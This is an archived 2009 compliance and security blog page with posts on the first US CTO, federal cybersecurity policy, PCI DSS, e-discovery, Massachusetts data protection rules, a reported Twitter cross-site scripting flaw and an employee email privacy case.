IT Compliance Advisor


September 9, 2009  5:50 PM

U.S. CTO Chopra on transparency and governing by outcomes at Gov 2.0

GuyPardon Guy Pardon Profile: GuyPardon

Aneesh Chopra is in a unique position. As the first chief technology officer (CTO) for the United States, he’s defining the role as he goes. During an interview with tech publisher Tim O’Reilly at the Government 2.0 Summit in Washington, D.C., the U.S. CTO provided more perspective on what he does and what citizens and businesses alike might expect from the current administration.

The role of the U.S. CTO

Chopra describes himself as an assistant to the president, where he focuses on providing advice on technology policy. In his words, “my role is to bring tech innovation and advocate for policy,” where his “unit of output” is policy recommendations.

Chopra offered the example of hearing in Silicon Valley that “some of our public policies weren’t market-oriented or innovative.” In response, he convened a roundtable to rethink that approach. O’Reilly commented that it sounded like the role of the U.S. CTO was “a lot like a diplomat or ambassador.” Chopra says he’s a convener, pulling together officials in the government to address needs and using digital tools to gather feedback from citizens, businesses.

O’Reilly asked about his relationship with Vivek Kundra, the U.S. CIO. The dynamic between CIO and CTO is a point of interest in most large enterprises — the federal government brings that to a new level.

Chopra pointed to Kundra’s influence on procurement. “If we have influence on standards, research and development (with $150 billion in R&D spend), the third lever is procurement.” As Chopra observed, spending trends of billions on technology has an effect on market outcomes, citing $76 billion dollars spent on IT alone.

Transparency

One of the buzzwords for in the new administration has been transparency. Chopra stated that “there should be accountability for each agency” and that “every agency will be directed to publish their open government plans” in response to the president’s open government directive. Chopra says that “there should be structured approach that is not tied to any particular White House.”

Governing by outcomes

O’Reilly pushed Chopra to look beyond social media or transparency, however, and consider “the bones of the government operating system,” citing the role that the federal government has already played in location technologies and the Internet backbone itself. Chopra said policy priorities include securing and improving the energy grid and cybersecurity. He said he sees “potential in government as a platform” but was clear “we will make investments based upon whether the platform will be utilized.”

He offered as examples the systems of incentives for physicians and electronic health record conversion, where healthcare entities “will get an incentive payment if they can demonstrate they are using the technology in a meaningful way.”

Chopra provided an example of how healthcare IT is being applied, explaining that research data is being gathered from “every single veteran who receives a procedure in a cath lab” in a veterans’ administration hospital. “Less than 10 minutes later, the physician gets a handheld device to draw what he did in each of the 70 VA hospitals. That’s then sent to a database at the American Institute of Cardiology.” Chopra says such data is protected under appropriate privacy and anonymity provisions. “That database probably submits the lion’s share of the digital data that can be mined by cardiologists,” says Chopra.

Preparing for “business” continuity

Chopra also focused on education and the upcoming flu season, reflecting the concerns of the CIO of the CDC about swine flu. “We’ve been invested heavily in digital learning,” said Chopra. “There’s now a healthy debate — especially in light of H1N1 concerns — what would happen if a school had to close for two or three weeks?” He referred to the H1N1 “Continuity of Learning” memo issued by HHS and the Secretary of Education, Arne Duncan. Providing virtual means for students and teachers to continue education efforts in the event of a healthcare disaster is clearly in play.

In other words, the U.S. CTO is worried about disaster recovery, getting the most from technology investments and remaining accountable to customers and clients -– not so different from the role of the classic enterprise CTO at all.

Reblog this post [with Zemanta]

September 3, 2009  8:16 PM

Evaluating the cybersecurity plan and the role of a federal CISO

GuyPardon Guy Pardon Profile: GuyPardon

Patricia TitusIn this episode of the IT Compliance Advisor, Associate Editor Alexander B. Howard interviews Patricia Titus about the Obama Administration’s cybersecurity plan, the creation of a federal CISO and where policy might move in the coming months. Titus was formerly chief information security officer at the Transportation Security Administration within the U.S. Department of Homeland Security.

When you listen to the podcast, you’ll hear Titus’ views on:

  • What’s new in the cybersecurity plan?
  • Why is it taking a while to name a cybersecurity coordinator?
  • Where is the U.S. CISO?
  • What would be the top challenges of a U.S. CISO, should one be appointed?
  • What are the elemental needs for implementing cybersecurity across government agencies?
  • How do the Rockefeller-Snowe Bill (S.773) and ICE Act fit into cybersecurity strategy?
  • What would ramping up the nation’s offensive capabilities in cyberwar mean?
  • What do compliance officers and CISOs need to think about this fall?

Note: Our colleague Mike Mimoso also interviewed Titus about the Obama cybersecurity plan in June for Security Wire Weekly, when the strategy was first released. The episode also features security luminary Howard Schmidt and Paul Kocher, chief scientist of Cryptography Research.

Reblog this post [with Zemanta]


September 1, 2009  4:57 PM

Anton Chuvakin on PCI DSS compliance, security and nonprofits

GuyPardon Guy Pardon Profile: GuyPardon

Anton ChuvakinWhen it comes to meeting the requirements of the Payment Card Industry Data Security Standard (PCI DSS), the mantra of the moment is compliance, not security. Anton Chuvakin, a well-known expert on PCI DSS compliance, has a number of recommendations for nonprofits in this podcast. Simply put, trust matters more when your relationship with donors is at risk.

When you listen to the interview, recorded with SearchCompliance.com Associate Editor Alexander B. Howard, you’ll hear more about how to minimize risk, the wisdom of outsourcing and why you should focus on the core mission of the nonprofit, not software development.

Reblog this post [with Zemanta]


August 28, 2009  5:01 PM

Email to the editor: ‘Data security: The missing piece of e-discovery’

GuyPardon Guy Pardon Profile: GuyPardon

This post below is an email to the editor received from Robert DeFazio of Calabria Consulting, responding to Data security: The missing piece of e-discovery” by Paul Roberts. This views expressed are those of Mr. DeFazio, not this publication or its editors. Comments on its content are welcome.

In an infamous commercial in the 1970s, the actor Chad Everett, who played a handsome doctor on the television series Emergency Room, said, “I’m not a doctor, but I play one on TV.” I’m not attorney, but I have read a lot about the practice of law and how it addresses computers and electronic evidence.

Part of what I do is to provide suggestions as to how data needs to be kept to mitigate the costs of e-discovery. What I have found is that IT department heads, enabled by the very business owners who would suffer the most in litigation, often feel comfortable dismissing the idea that lawyers properly belong in the loop when it comes to making decisions about how data is stored. Instead, they point to conventional “best practices” that represent the path of least blame should something ever go awry.

The harsh realities of litigation should strike fear into the hearts of every CTO and CIO. Why? The requirements for the admissibility of evidence in court regarding electronic documents focus largely on how hearsay evidence is treated.

In some jurisdictions and courts, the Federal Rules of Evidence and Federal Rules for Civil Procedures are disregarded when it comes to electronic documents because, quite frankly, the judges and attorneys involved simply don’t understand the nature of digital data. They have no idea of what metadata is and why it is important. They don’t seem to understand why the concept of presumption, which is used so often in other areas of legal theory, is often inappropriate when it comes to the authentication of electronic documents. They seem not to understand that electronic documents in native file formats can be manipulated easily. They naïvely trust that anything that comes from a computer is accurate and not hearsay because it’s not produced with a “touch from human hands.”

In other courts, they pay attention to the rules of evidence. They want software that purports to offer factual evidence itself to be authenticated. They want real proof that a document is an original copy or that the copy offered can be shown to meet tests that demonstrate it matches, byte for byte, a reference copy that has an unbroken chain of custody. They want to see that there are specific written policies and procedures that would reasonably assure that a stored document would not be altered during its archival. They want to see things like digital signatures, asymmetric encryption key pairs being used to secure documents, and a host of other up-to-date practices that courts in other countries regard as the ONLY measures that assure the authenticity of documents.

This means that data security must be viewed from a different perspective from what the prevailing notion of best practices. Not only does data need to be retained for operational efficiency in the event of a data disaster, but it must also be managed along a separate pathway in such a way that it will meet the needs of attorneys who must defend the corporate endeavor in the event of litigation. Data needs to be cataloged at the time it is stored in accordance to its likely future legal usage. Archived data needs to be kept in two different ways: one for purposes of disaster recovery and the other for legal purposes.

Moreover, the legal archives should not be regarded as a form of “backup data.” They should be regarded as comprising a database in their own right, requiring their own disaster recovery backups.

Why? E-discovery is very expensive. In most states, it is the respondent to a demand for documents that must pay for discovery costs, not the requesting party. E-mail, backup tapes, instant messages, word processing documents, cached files from Web browsers, deleted and fragmented files, network logs, databases, event logs, contents of PDAs and cell phones, and entire disk drives from on-site servers, workstations, home computers, contractors’ computers, and much more is what is typically sought in the process of e-discovery. Litigation holds can be placed on parties even if they are not directly involved in the lawsuit that dictates. These parties then cannot add, delete or modify the contents of disk drives or other equipment not only during the discovery process but perhaps even until the litigation is finished and has gone through all appeals.

Just how expensive e-discovery can be is illustrated in specific cases and the assumptions that the legal profession has made about what is a reasonable range of e-discovery costs. In the 2002 case of Rowe Entm’t v. William Morris Agency, e-discovery costs incurred exceeded $10.9 million before the first day of the trial ever occurred. In cases of patent litigation, the common costs of litigation easily run between $4-5 million, most of that being e-discovery costs. Many attorneys now accept that the costs of e-discovery for litigation involving a small to medium-size company would range between $2-3.5 million.

E-discovery is now a multibillion dollar industry. Sharks go where there is blood. Litigation support industries spring up around the areas of litigation where there is the most confusion, with respect to evidence, and the highest likelihood of maximum billable hours. When companies keep data here, there and everywhere in ways that make sense to a tech employee whose job it is to keep the machinery of the company moving, it will require an incredible amount of time and work to reconstruct data and documents for purposes of pursuing litigation in court. A tech employee wouldn’t usually understand this, but the company’s attorney would or should. The company’s attorneys need to be part of the group of decision makers when it comes to establishing data storage requirements.

“Anathema!” you say? Get used to it, or eventually go out of business. Litigation is often not so much the pursuit of justice as it is the exercise of legal intimidation. By escalating the demands for electronic documents in the pretrial stages, the costs to be borne by a respondent can rapidly become more than the amount the party intended to recover by going to court in the first place, forcing settlement instead of resolution. Managing data so that it is easy to identify from a legal perspective may not make sense at the moment, but as soon as a suit is filed that seeks damages in the amount of $50 million, the cost of maintaining parallel archives (disaster vs. legal) would seem like a drop in the bucket.

I am sure that someone who reads this might conclude that keeping electronic data in this way is just about as expensive as keeping everything on paper. To that, respond, “You might be right.” The American mind-set always wants proof that this or that is true. If you have the original stone tablet, you can compare the chisel marks to samples of other stone tablets made by the same person to authenticate it. A stone tablet or a piece of paper represents a finished work, where further modification has ceased. The ephemeral nature of electronic data, however, erodes nearly all the traditionally understood landmarks of evidence trustworthiness. The bar is, therefore, set much higher when it comes to the admissibility and weight afforded to electronic evidence. In some cases, a man’s freedom might be at stake because of a decision about the authenticity of an e-mail message. In another case the survival of an entire corporation and all the jobs and income it produces might hang on the wording of a single sentence in a 200-page document where the opposing parties offer copies where there is a difference of one word.

Data processing costs have been traditionally viewed as being economical because the cost of litigation was never folded into the mix of expenses of running a data-centric business. E-mail, instant messages, electronic documents, databases … all these things make the operation of business much easier to achieve. They also make the defense of a business much more expensive to conduct when things go wrong.

The cost of running an IT department includes:

  • high levels of security
  • backup procedures for purposes of disaster recovery
  • archives where the documents must be individually cataloged for future legal use
  • backups of legal-oriented archives
  • indexing legal documents using OLAP approaches
  • retrieval of documents during litigation
  • maintaining both on-site and one or more off-site storage facilities

That’s a much bigger number than one that just takes into consideration running some servers and workstations and making daily backup tapes. It is that number that needs to be stacked up against the cost of doing things on paper.


August 28, 2009  1:46 PM

Information technology: Key enabler to a sustainability strategy

Scot Petersen Scot Petersen Profile: Scot Petersen

Adam Werbach is Global CEO of Saatchi & Saatchi S, a sustainability agency, and author of a new book, Strategy for Sustainability. Werbach writes that, “sustainability initiative(s) must be core to the business—bold, not bolted on.” In this email interview, he expands on IT’s role as a primary driver for sustainable business, and adds that, despite voluntary initiatives, “eventually, all businesses will be regulated into compliance.”

Is information technology, including the people, hardware, software and processes, going to be the primary driver for developing sustainable business practices, or one of many tools toward that end?

Adam Werbach: IT is a critical enabler to a more sustainable enterprise. The first characteristic of a sustainable business is that it’s transparent. Transparency means getting salient metrics widely spread into the organization. The IT function can play an essential role in this sort of transparency. There are also direct benefits in energy savings, telecommuting, and logistics efficiency support that IT can aid.

What is the best role for IT in a sustainability strategy?

AW: Convener. Building a sustainable organization requires the creation of cross-functional network, where non-traditional authority can solve systemic problems. Since IT crosses all divisions, it sits in a perfect location to bring groups together for design charrettes.

Do you envision sustainability managers being able to “model” capital expenditures around sustainability in the same way the finance department develops net present value models for everything else? In other words, will companies be able to determine ROS (return on sustainability) for sustainable initiatives?

AW: Absolutely. In most cases sustainability investments will simply be blended into existing capital programs. Some companies have lowered the hurdle rate for investments connected to clean energy for examples, as a means of hedging against future price spikes in energy or the public relations value of the investment. In this case the bar is lowered because of broader corporate benefits.

Will such ROS calculations be built only around cost savings or can sustainable practices actually make money for a company?

The best topline opportunities right now exist in the expansion of a product to a new consumer (or B2B) customer base. There are an exceedingly large number of companies and consumers that are adding sustainability as a primary or secondary buying attribute. Eventually, all businesses will be regulated into compliance, but right now companies that are leading the pack are gaining new customers.


August 26, 2009  3:15 PM

Twitter security hole highlights need for a social media policy today

GuyPardon Guy Pardon Profile: GuyPardon

Once again, Twitter security is in the headlines. Yesterday, SEO expert Dave Naylor posted that James Slater had found a cross-site scripting vulnerability in Twitter. Cross-site scripting (XSS) is a common – and nasty – security exploit allows a malicious hacker to insert JavaScript code into links that a user believes are trustworty. Instead of sending a user to a given website, that script would then execute, which could allow any number of ugly outcomes, including worms, malware infections or harvesting of session cookies.

While no apparent damage to privacy or senstive data has occurred through this XSS exploit, the lesson from the past 24 hours is that a social media usage policy needs to be drafted, promulgated and enforced ASAP.

Although Ben Parr wrote on the social media blog Mashable that Twitter exploit had been fixed, echoing Twitter staff comments, Naylor followed up today with evidence that the Twitter exploit still works – just visit @APIfail2 for a (harmless) example. You’ll need to view the account using a Web browser, given that 3rd party clients are not affected by the issue.

TechCrunch has picked up the lack of resolution to the Twitter security issue. Robin Wauters, the author of the post, has sought further comment from the startup. Although the security team at the online social messaging startup is no doubt working overtime to address the issue in a more substantive way, this episode only adds fresh concerns about the Twitter security risks I reported on in June. Twitter may need to hire a CISO soon.

Such online security concerns, however, aren’t hardly limited to Twitter. If anything, Facebook is an even bigger target, both because of its size and the likelihood of more personal information in profiles. That reality hasn’t gone unnoticed by hackers, as rogue Facebook phishing applications popped up last week.

In this photo illu...

What does this all means for the compliance and security community? It’s time to get serious about addressing the risk by drafting a social media policy that uses available DLP technology, sets expectations for online privacy and, perhaps most importantly, includes user education about Web app security, social engineering and phishing. As I reported earlier this month in a story exploring social media and compliance, “fewer than one-third respondents in a recent survey said their organization had a policy in place governing social media use” – and “only 10% of the companies surveyed indicated that they had conducted employee training on such use.”

According to a another survey, from security firm AVG, only 27% social networking users are taking steps too protect themselves against similar online threats. According to “Bringing Social Security to the Online Community,” conducted with the CMO Council, 20% of social networking users have been the victim of identity theft. 55% experienced a phishing attack. And 47% said that they’ve had to deal with malware. Stark numbers.

In other words, if social media security wasn’t on your task list already, it should be now.

Reblog this post [with Zemanta]


August 25, 2009  5:29 PM

Capability and Maturity Model Creation in Information Security

GuyPardon Guy Pardon Profile: GuyPardon

This is a guest post from Secure Payments and Chaordic Design Evangelist Michael Dahn. He blogs frequently about PCI and information security at ChaordicMind.com. Contact him there or follow @sfoak on Twitter.

One of the problems that many companies face is staying ahead of the information security curve. Go too fast and you run the risk of wasting capital, but run too slow and you run the risk of being compromised. So how a company can escape the hamster wheel of pain? Be proactive in managing risk and implementing a maturity framework for the organization.

PCI Data Security...
Image by purpleslog via Flickr

In an attempt to balance the two domains of cost and security, a continual tradeoff, many companies have implemented regulatory compliance standards. These are good tools for measuring ones security to a known industry baseline. The classic example of this is the Payment Card Industry Data Security Standard (PCI DSS). Using standards like PCI DSS, companies can measure their adherence to eliminating sensitive data and protecting the remaining in-scope systems.

There are two problems with aligning an entire information security model along any singular guideline. It should be noted that, in the absence of any information security program, PCI DSS is a very good baseline standard.

The first challenge is the 0-to-100 problem. Some companies start with no information security program and try to adhere to something like PCI DSS. Much like measuring the acceleration of a car by how fast it can go from 0 to 100 miles per hour, these companies struggle with getting from 0 to 100 percent compliance in under 12 months. For these companies this means implementing security for the sake of a deadline, which means not always having the time to test what works and what does not.

The second challenge is the security limiter problem. Once companies reach 100 percent adherence to a given standard, many times they stop developing their information security program. These companies then enter a vicious cycle of identification and remediation. Each year, their auditors alert them to a new set of issues and, each year, the companies fix those and then relax until the following year.

So how do we escape this endless cycle of identification and remediation? How do we provide a way for companies to go from 0 mph to 50 mph in year one, 50 to 100 in year two, and still be inspired to go from 100 to 150 in year three? How do we become proactive instead of being reactive? One option for addressing these problems is the capability maturity model (CMM) that involves risk management.

A CMM is nothing new or innovative. It’s a useful approach for managing the maturity in a system. The Computer Security Handbook 4th Edition reveals that CMMs originated from software development. This book states that a CMM “can be used as a way to assess the soundness of a security product builder’s engineering practices during the many stages of product development.” If a CMM can be used for measuring the soundness of engineering practices, then why not leverage it to measure the soundness of information security practices?

A maturity model encourages continual growth rather than strict adherence to Procrustean boxes of information security. It’s the mathematical equivalent of the integral or the continual variable transmission of an automobile. It provides a smooth curve instead of designated endpoints of information security. For companies suffering from the 0-to-100 problem, a maturity model enables growth from 0-to-50 initially, with the projection of moving from 50-to-100 at a later date. Companies that suffer from the security limiter problem have the ability to continuously and proactively plan information security development to parallel growing business needs, instead of an independent set of criteria.

The Information Security Management Maturity Model (ISM3, or ISM-cubed) provides us with the intersection of information security and a maturity model for growing an information security program. ISM3 describes the process this way:

“Rather than focusing on controls, it focuses on the common processes of information security, which are shared to some extent by all organizations.

Under ISM3, the common processes of information security are formally described, given performance targets and metrics, and used to build a quality assured process framework. Performance targets are unique to each implementation and depend upon business requirements and resources available. Altogether, the performance targets for security become the Information Security Policy. The emphasis on the practical and the measurable is what makes ISM3 unusual, and the approach ensures that ISM systems adapt without re-engineering in the face of changes to technology and risk.”

In fact, the ISM3 is based in part on extending the Systems Security Engineering Capability Maturity Model (SSE-CMM), which is ISO standard 21827. The SSE-CMM “describes the essential characteristics of an organization’s security engineering process that must exist to ensure good security engineering.”

In addition, consider the Building Security in Maturity Model (BSIMM), which is “designed to help you understand and plan a software security initiative.” As well there is the, Open Software Assurance Maturity Model (OpenSAMM) project that can “help organizations formulate and implement a strategy for software security that is tailored to the specific risks facing the organization.” These frameworks exist as tools for helping develop the maturity of organizations and software through the use of measured metrics.

And metrics is where all the magic really happens. Only by measuring the maturity of an organization and matching it to the development and progress of known attacks can we demonstrate that we are maintaining the balance between costs and security. There is a saying that if you and your friend are being chased by a bear, you don’t need to outrun the bear — you need only outrun your friend. In the world of ever-increasing compromises, many companies struggle to stay ahead of the curve. A maturity model, with proper metrics, can help your organization do just that. The best part? Companies that implement a maturity model and show measured growth are many times more likely to adhere to industry standards such as the PCI DSS.

Reblog this post [with Zemanta]


August 21, 2009  4:10 PM

Clarifying mobile encryption requirements for 201 CMR 17.00 compliance

GuyPardon Guy Pardon Profile: GuyPardon

When I reported on amendments to the Massachusetts data protection law earlier this week, one of the comments that undersecretary of consumer affairs Barbara Anthony made was a point of interest to many enterprise IT professionals who must determine what 201 CMR 17.00 compliance will mean.

Specifically, Anthony stated that, “We know right now that there’s no widespread technology for encrypting mobile devices, but we know it’s there for laptops.”

This driver is using two phones at once
Image via Wikipedia

Given that the regulation’s language includes a requirement for encryption where “technically feasible,” the issue demanded clarification. I contacted Secretariat CIO Gerry Young, who was involved in drafting the original regulation. He offered the following guidance on mobile encryption:

“This just belies unfamiliarity with the current state of encryption. Even a cursory scan will show that technologies like Snapcell, Navastream, AlertBoot, SecurStar PhoneCrypt, Endoacustica and Babylon nG have carried cell phone encryption to fairly sophisticated stages.

“Encryption for cellular phones has evolved beyond even enterprise-class smartphones, and you are beginning to see robust offerings for 3G phones available at attractive price points.

“European companies like Navastream (Germany) are making inroads in U.S. markets to fill a clear void. This will help to drive competition, and push price points lower for the consumer.

“I would think that once there are free, open source encryption alternatives — along with a plethora of low-cost encryption vendors in the cellular market — that we would be ready to mandate cell phone encryption in the near future.”

In other words, encrypting mobile devices and smartphones remains a best practice, particularly where resident PII is present, but is not mandated for 201 CMR 17.00 compliance — yet.

Reblog this post [with Zemanta]


August 20, 2009  6:09 PM

Amended Massachusetts data protection act focuses on risk management

SarahCortes Sarah Cortes Profile: SarahCortes

As Alexander Howard reported earlier today, the Massachusetts data protection law has been amended. The revised data privacy regulations — 201 CMR 17.00, “Standards for the Protection of Personal Information of Residents of the Commonwealth” — include several key updates. If you are an information security professional, take note of these changes, as they will likely have practical implications.

The most immediate impact is the provision for an additional 60 days to comply with the regulations. The deadline for implementation is now March 1, 2010.

Individuals and municipalities have expressly been removed from guideline jurisdiction, with a clarification that the “regulation applies to those engaged in commerce.” Guidelines on the requirement for a written information security plan are now simplified.

A new definition for the term service provider was added. The Office of Consumer Affairs and Business Regulation also amended third-party vendor rules. There is now a two-year grace period, relative to existing contracts, and requirements for those third parties to be in compliance.

Encryption requirements have been clarified. The apparently strict but, practically speaking, vague 128-bit specification from the prior version was replaced by “technology-neutral language.”

Further, a “technical feasibility” standard has been incorporated, acknowledging that methods to securely encrypt data on portable devices may not yet be available. Email encryption now falls under the technical feasibility standard. Additionally, encryption of backup tapes has been clarified to include prospective encryption. So you may safely cancel your firm’s plans to encrypt existing backup tapes. Encrypting new backup tapes will still be required, along with any personal data that travels over the public Internet or wireless network.

In another change that I believe will ultimately enhance consumer protection, 201 CMR 17.00 has been brought in line with certain federal regulations. Specifically, the Massachusetts data protection act now cedes authority to the Federal Trade Commission‘s (FTC) standards established under the Gramm-Leach Bliley Act (GLBA). GLBA utilizes a risk management approach to data security.

The patchwork of 44 different state health data protection laws has delayed electronic automation of, and therefore overall security for, health records. Adopting a federal standard, starting with the FTC’s risk-based approach to data protection, avoids this pitfall and may make widespread compliance both more feasible and more likely in the near future.

On one hand, a risk management approach should be familiar to IT professionals. It shifts resources from “check-the-box” controls that may or may not address a particular organization’s specific risks to controls that make more sense in context. On the other hand, given the concrete definition of the personal information in scope, it is difficult to see where risk management would not be present whenever such personal data is stored.

“Mandating every component of a program and requiring its adoption, regardless of size and the nature of the business and the amount of information that requires security, makes little sense in terms of consumer protection,” said Bradley MacDougall, of Associated Industries of Massachusetts. Risk management and assessment will afford more consumer protection by matching a given business’ actual risks with required security investments.

Reblog this post [with Zemanta]


August 19, 2009  9:03 PM

The impact of Stengart v Loving Care on employee online privacy

GuyPardon Guy Pardon Profile: GuyPardon

This is a guest post from SearchCompliance.com contributor Andrew M. Baer, Esq. You can follow him at @baerbizlaw on Twitter.

The Stengart v. Loving Care case that Alexander Howard wrote about in ”The Web of social media and compliance: The ECPA and online privacy” is a very interesting one and merits closer examination. In that case, a New Jersey appellate court held that an employee did not waive her attorney-client privilege in communications with her lawyer that she sent through her personal Yahoo email account using a work computer, despite the employer’s attempts to argue that its electronic communications policy made the emails its property.

While the court’s opinion contains some lofty language about how an employer’s right to regulate its workplace is not limitless, the case actually turned on several key facts. Therefore, like the Pietrylo case discussed in my article on employee social media use policy, it can be seen as a case study in botched compliance.

The first half of the opinion deals with questions about the following:

  • Whether the electronic communications policy was even in force and applied to the plaintiff.
  • Whether or not it was disseminated and the plaintiff had notice of it.
  • Which version (of several) was the applicable one.
  • How the policy was to be interpreted in light of its rather shoddy drafting and contradictory statements regarding the allowance of personal communications.

The appellate court found that the lower court had not conducted a proper evidentiary inquiry concerning these issues. In particular, how a policy is drafted and how it should objectively be interpreted has a huge impact on what sort of online privacy expectations it is reasonable for an employee to have. The court also specifically noted that the employer had not followed the customary practice of obtaining from its employees a signed acknowledgment of the policy.

The policy also took the position that communications made using work computers became the “property” of the employer, which clearly rubbed the court the wrong way. To sum up, if:

  1. The policy had been limited to specifying a right to monitor;
  2. Had linked this right to a clear, unambiguous and customary set of prohibitions regarding personal communications;
  3. Had been consented to in writing by the plaintiff;

It might not have been so offensive to the court.

Last but not least, despite the lofty statements about privacy in the workplace that I referred to earlier, these have no significant effect as precedent. As the court itself admitted, the real issue in the case was not defining the scope of the restrictions on an employer’s ability to access personal employee communications made using corporate IT resources. Instead, it was whether the plaintiff, in the particular facts and circumstances of the case, should lose her attorney-client privilege in certain emails.

The attorney-client privilege is sacred, particularly in New Jersey, as I know from past experience there. Courts will strain to avoid finding that a waiver has occurred, except in situations where a litigant behaves as if it doesn’t care whether its communications with an attorney are intercepted or not. In Stengart, the court effectively concluded that, despite the electronic communications policy, the plaintiff had not exhibited that level of indifference. The defendant’s law firm also seems to have behaved badly by reading the attorney-client emails and not alerting the plaintiff’s counsel that it had possession of these emails.

So, a small victory for employee online privacy at best, but one that contains important lessons for corporate compliance officers and counsel.

Reblog this post [with Zemanta]


Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: